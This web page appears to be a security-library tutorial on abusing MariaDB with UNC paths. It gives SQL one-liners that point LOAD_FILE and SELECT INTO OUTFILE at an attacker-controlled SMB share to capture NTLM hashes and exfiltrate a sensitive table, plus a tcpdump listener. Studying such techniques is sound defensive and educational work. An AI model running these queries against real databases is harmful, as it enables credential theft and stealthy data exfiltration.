New version of Cyber Library is out! Check it out 🎉

MariaDB UNC Path Attack

Context

This article aims to teach how to exploit MariaDB using UNC paths for NTLM hash capture and network exfiltration. To fully understand and execute this technique, familiarity with UNC paths, NTLM authentication, network exfiltration, and previous knowledge of MariaDB out-of-band attacks are assumed.

Theory

UNC Path Exploitation in MariaDB

UNC (Universal Naming Convention) paths are a way to specify network resources such as shared files or printers. MariaDB can be leveraged to make outbound requests to these paths, which presents a security vulnerability. This can be exploited by injecting a SQL query designed to trigger such a connection.

NTLM Hash Capture via UNC Paths

NTLM (NT LAN Manager) authentication can be induced by redirecting a MariaDB instance to access a UNC path. If the path points to an attacker's controlled server, it can capture the NTLM hashes sent by MariaDB as part of the authentication process.

Network Exfiltration Using UNC Paths

Using UNC paths, data can be directed from MariaDB to a controlled server. This method allows an attacker to exfiltrate information such as sensitive database contents without detection by simply routing it to a malicious server under their control.

Practice

MariaDB UNC Path Attack

To execute a MariaDB UNC Path Attack, follow these steps:

Initiate a SQL Query: Use the following SQL command to force MariaDB to access a UNC path. This triggers NTLM authentication by attempting to load a file from an attacker's share:
```
SELECT LOAD_FILE('\\\\attacker\\share\\file');
```
Monitor for Incoming NTLM Hash Requests: Configure your server to capture NTLM hash requests. This typically involves setting up an environment to listen for SMB traffic. Ensure all necessary services are running.
Capture Network Traffic: To observe network traffic and NTLM hash exchanges, execute the following command on your server:
```
tcpdump -i eth0 port 445
```

Upon successful execution, NTLM hashes should be captured from MariaDB's attempt to access the UNC path.

Data Exfiltration via UNC Path

To exfiltrate data from MariaDB using a UNC path:

Execute a Data Exfiltration Query: Use this SQL command to export data from a sensitive database table to a remote UNC path:
```
SELECT * INTO OUTFILE '\\\\attacker\\share\\data.txt' FROM sensitive_table;
```
Verify Data Reception: Ensure that the data arrives correctly at your server. Monitoring tools or manual checks might be needed to verify the integrity and completeness of the exfiltrated data.

This method allows sensitive data to be stealthily transferred to the attacker's server as specified by the engineered UNC path.

Tools

tcpdump
Wireshark

These tools support monitoring and analyzing network traffic, making them crucial for capturing NTLM hashes and verifying data exfiltration during a MariaDB UNC Path Attack.

Mariadb Dns Exfiltration

Mariadb Read Content Of A File

Loading contributors...

On This Page

Context Theory UNC Path Exploitation in MariaDB NTLM Hash Capture via UNC Paths Network Exfiltration Using UNC Paths Practice MariaDB UNC Path Attack Data Exfiltration via UNC Path Tools

Contribute to Cyber Library!

Have an idea? Help us build the ultimate resource for cybersecurity by sharing your content suggestions.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.